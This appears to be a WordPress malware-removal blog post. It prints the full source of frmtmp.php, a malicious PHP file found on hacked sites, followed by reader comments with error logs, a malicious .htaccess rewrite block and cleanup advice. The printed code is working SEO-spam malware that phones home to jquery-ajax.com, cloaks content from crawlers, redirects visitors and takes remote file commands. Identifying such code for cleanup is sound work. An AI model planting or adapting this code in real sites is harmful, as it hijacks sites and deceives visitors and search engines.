WordPress modifier ๐
<?php
@ini_set('display_errors', '0');
@ini_set('max_execution_time', '10');
@ini_set('memory_limit', '1024M');
if ( file_exists("{$eb}.st/.r")) {
$pamparam = file_get_contents("{$eb}.st/.r");
$eqq = explode('|', $pamparam);
if ($eqq[2]) $qq = trim($eqq[2]);
if ($eqq[3]) $lang = trim($eqq[3]);
}
$ip = urlencode($_SERVER['REMOTE_ADDR']);
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
if (isset($_GET["$qq"]) && $_GET[$qq] && file_exists("{$eb}.st/.r")) {
$crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i';
if (preg_match($crawlers, $ua)) {
$abt = 1;
}
$fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
$out = "GET /lnk/tuktuk.php?checkbot=1\&ip=$ip&ua=$ua HTTP/1.1\r\n";
$out .= "Host: jquery-ajax.com\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$otvet .= fgets($fp);
}
fclose($fp);
if (strstr($otvet, 'BOT')) $abt = 1;
$page = urldecode($_GET["$qq"]);
$key = str_replace('-', ' ', $page);
$htitle = ucfirst($key);
$rating = rand(3,5);
$rcount = rand(120,220);
$txt = "<div itemscope=\"\" itemtype=\"http://schema.org/Product\">\n<span itemprop=\"name\">$htitle</span>\n<div itemprop=\"aggregateRating\" itemscope=\"\" itemtype=\"http://schema.org/AggregateRating\">\n<span itemprop=\"ratingValue\">$rating-5</span> stars based on\n<span itemprop=\"reviewCount\">$rcount</span> reviews\n</div>\n</div>\n";
$ukey = urlencode($key);
$pamparam = file_get_contents("{$eb}.st/.r");
$epamparam = explode('|', $pamparam);
$redir = $epamparam[0];
$group = $epamparam[1];
if (!$abt) {
header_remove();
if (strstr($redir, '?')) $redir .= "&keyword=".urlencode($key);
else $redir .= "?keyword=".urlencode($key);
//header("Location: $redir");
echo "<frameset cols=\"100%\"><frame src=\"$redir\"></frameset>";
}
if (file_exists("{$eb}.st/$page.txt")) {
$gtxt = file_get_contents("{$eb}.st/$page.txt");
$etxt = explode('|', $gtxt);
$txt = $etxt[0];
$desc = $etxt[1];
}
else {
$desc = '';
$fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
$out = "GET /lnk/gen/?key=$ukey&g=$group&theme=$group&lang=$lang HTTP/1.1\r\n";
$out .= "Host: jquery-ajax.com\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$ttxt .= fgets($fp);
}
fclose($fp);
preg_match('#gogogo(.*)enenen#is', $ttxt, $mtchs);
$txt .= $mtchs[1];
$fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
$out = "GET /lnk/gen/desc.php?key=$ukey&desc=$group HTTP/1.1\r\n";
$out .= "Host: jquery-ajax.com\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$desc .= fgets($fp);
}
fclose($fp);
preg_match('#gogogo(.*)enenen#is', $desc, $mtchs);
$desc = $mtchs[1];
file_put_contents("{$eb}.st/$page.txt", "$txt|$desc");
}
}
if (isset($_REQUEST["del"])) {
$page = urldecode($_REQUEST["del"]);
if (file_exists("{$eb}.st/$page.txt")) {
unlink("{$eb}.st/$page.txt");
echo "---deleted---";
}
}
if (isset($_REQUEST["create"]) || $_REQUEST["create"]) {
if (!file_exists("{$eb}.st")) {
$qq = $_REQUEST['qq'];
mkdir("{$eb}.st");
}
else {
$pamparam = file_get_contents("{$eb}.st/.r");
$eqq = explode('|', $pamparam);
if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq'];
else $qq = trim($eqq[2]);
}
$redir = urldecode($_REQUEST['redir']);
$group = $_REQUEST['group'];
$lang = $_REQUEST['lang'];
file_put_contents("{$eb}.st/.r", "$redir|$group|$qq|$lang");
if (file_exists("{$eb}.st/.r")) echo "---created---";
}
ob_start();
function shutdown() {
global $eb; global $txt; global $qq; global $title; global $desc;
$ip = urlencode($_SERVER['REMOTE_ADDR']);
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
$donor = urlencode($_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);
$otvet = '';
if (!$_GET["$qq"]) {
$fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
$out = "GET /lnk/tuktuk.php?d=$donor&ip=$ip&ua=$ua HTTP/1.1\r\n";
$out .= "Host: jquery-ajax.com\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$otvet .= fgets($fp);
}
fclose($fp);
preg_match('#<(.*)>#is', $otvet, $els);
$l = $els[0];
$ll = explode("\n", $l);
}
$my_content = ob_get_contents();
ob_end_clean();
if ($_GET["$qq"]) {
$title = str_replace('-', ' ', $_GET[$qq]);
$title = ucfirst($title)." - ".$_SERVER['SERVER_NAME'];
$my_content = preg_replace('#<p>(.*)</p>#is', "<p>\n$txt\n</p>", $my_content, 1);
$my_content = preg_replace('#<title>(.*)</title>#is', "<title>$title</title>", $my_content, 1);
if (preg_match('#<meta name="description"(.*)>#is', $my_content)) $my_content = preg_replace('#<meta name="description"(.*)>#i', "<meta name=\"description\" content=\"$desc\">", $my_content, 1);
else $my_content = preg_replace('#</head>#i', "<meta name=\"description\" content=\"$desc\">\n</head>", $my_content, 1);
$my_content = preg_replace('#<meta name="keywords"(.*)>#i', '', $my_content, 1);
$my_content = preg_replace('#<h1(.*)</h1>#i', "<h1>$title</h1>", $my_content);
$my_content = preg_replace('#<h2(.*)</h2>#i', "<h2>$title</h2>", $my_content);
$my_content = preg_replace('#<span class="entry-date">(.*)</span>#i', '', $my_content);
$my_content = preg_replace('#<script(.*)</script>#i', '', $my_content);
$my_content = preg_replace('#<time(.*)</time>#i', '', $my_content);
$kuku = 1;
}
if (!$kuku) {
foreach ($ll as $ln) {
$ln = str_replace('<br>', '', trim($ln));
if (preg_match('#<p(.*)>#', $my_content)) {
$my_content = preg_replace('#<p(.*)>#', "<-p->\n$ln ", $my_content, 1);
}
elseif (preg_match('#<span(.*)>#', $my_content)) {
$my_content = preg_replace('#<span(.*)>#', "<-span->$ln ", $my_content, 1);
}
elseif (preg_match('#<strong>#', $my_content)) {
$my_content = preg_replace('#<strong>#', "<-strong->$ln ", $my_content, 1);
}
elseif (preg_match('#<b>#', $my_content)) {
$my_content = preg_replace('#<b>#', "<-b->$ln ", $my_content, 1);
}
elseif (preg_match('#<i>#', $my_content)) {
$my_content = preg_replace('#<i>#', "<-i->$ln ", $my_content, 1);
}
elseif (preg_match('#<u>#', $my_content)) {
$my_content = preg_replace('#<u>#', "<-u->$ln ", $my_content, 1);
}
}
$my_content = str_replace('<-p->', '<p>', $my_content);
$my_content = str_replace('<-span->', '<span>', $my_content);
$my_content = str_replace('<-strong->', '<strong>', $my_content);
$my_content = str_replace('<-b->', '<b>', $my_content);
$my_content = str_replace('<-i->', '<i>', $my_content);
$my_content = str_replace('<-u->', '<u>', $my_content);
}
echo $my_content;
}
register_shutdown_function('shutdown');
?>
32 thoughts on “frmtmp.php”
Hi,
I’ve been hit by the darn file for sure. Here’s my debug:
[11-Jan-2016 21:58:27 UTC] PHP Notice: Undefined variable: eb in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 6
[11-Jan-2016 21:58:27 UTC] PHP Notice: Undefined variable: qq in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 14
[11-Jan-2016 21:58:27 UTC] PHP Notice: Undefined index: create in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 91
[11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 118
[11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined offset: 0 in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 129
[11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 134
[11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined variable: kuku in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 149
[11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined variable: eb in /var/sites/i/*******/public_html/frmtmp.php on line 6
[11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined variable: qq in /var/sites/i/*******/public_html/frmtmp.php on line 14
[11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined index: create in /var/sites/i/*******/public_html/frmtmp.php on line 91
[11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/frmtmp.php on line 118
[11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined offset: 0 in /var/sites/i/*******/public_html/frmtmp.php on line 129
[11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/frmtmp.php on line 134
[11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined variable: kuku in /var/sites/i/*******/public_html/frmtmp.php on line 149
I also found a .st file in my public_html folder which I deleted.
However, I can’t find this frmtmp which seems to be hidden or something.
I cannot for the life of me find any solution and I have this white screen of death thing.
Please can you help?
Thanks in advance.
From a desperate person
Reply sent ๐
I am facing the same issue. Can location the file frmtmp.php in my WordPress.
I tried isecurity, securi, Antimalware and wordfence. They are able to detect the virus and remove it temporarily but it reappears within a day.
The error wordfence shows is-
Undefined index in….*******/public_html/********/wp-admin/frmtmp.php on line 127
Please help.
Reply sent ๐
I have this error too. Even if I’m showing hidden files on my root folder, I can’t seem to see this file. I’ll appreciate any help mate. Thanks.
PHP Warning: Invalid argument supplied for foreach() in /home/*****/public_html/frmtmp.php on line 165
Reply sent ๐
I am facing the same issue. Can location the file frmtmp.php in my WordPress. Can you help?
Reply sent ๐
please help!!!
Reply sent ๐
Please help! I need to fix this!
Reply sent ๐
Hi Robert, I’m desperate with this, I can’t get rid of frmtmp.php, I keep deleting it from a couple of websites and then it shows up again after a certain time. What can I do to completely remove it?
Mail sent too! ๐
I have the same virus frmtmp.php
Please help!
Mail sent!
Can you hook me up? I am not sure how to fix this. It keeps showing up. I’d also love to know how it was injected?
Mail sent ๐
This is nasty, start at your htaccess file, if it looks like this then replace with the original. look for a file called bt. in root…
#BEGIN_WPLFRM
RewriteEngine On
RewriteRule ^-(.+):(.+)$ index.php?=$1 [R=301,L]
#END_WPLFRM
Can you also help me on this? thank you
Hi Ash! I suggest update your WordPress and all the modules. After that download the whole site to your computer, compare all files one-by-one with original WordPress files (download from https://wordpress.org/download/) and examine rest of the files one-by-one for malicious code. If you need help, I can do the virus removing, send an email to webmaster@wordpressvirusremoval.com
Same problem ๐
Hi David! Mail sent, same solution like Ash below! ๐
Hi Robert, I am having same issue,can you send me the solution?
Hi Robert
I have the same problem with a website on my server. Can you please help?
Thanks!
same problem, can you send me the solution?
Hi Robert
I have been looking through a lot of files, trying to restore WP infected by this, and have located the files. I dont see the same issue with the .htaccess as one mentioned – However I hope your guidance might help me, as I seem stuck
Same here, did you find a way to remove this malware?
Could you please let me know how to get rid of this trouble maker ? Thank you in advance
I am facing the same issue now..how do you guys solved it?
Solved..I deleted all frmtmp.php and .bs files and replaced the wp-admin and wp-includes with new ones and deleted all strange file that are not part of the core wordpress or has any thing to do with my website.
As Nay Lin suggested, there’s no ultimate solution.
I suggest update your WordPress and all the modules. After that download the whole site to your computer, compare all files one-by-one with original WordPress files (download from https://wordpress.org/download/) and examine rest of the files one-by-one for malicious code.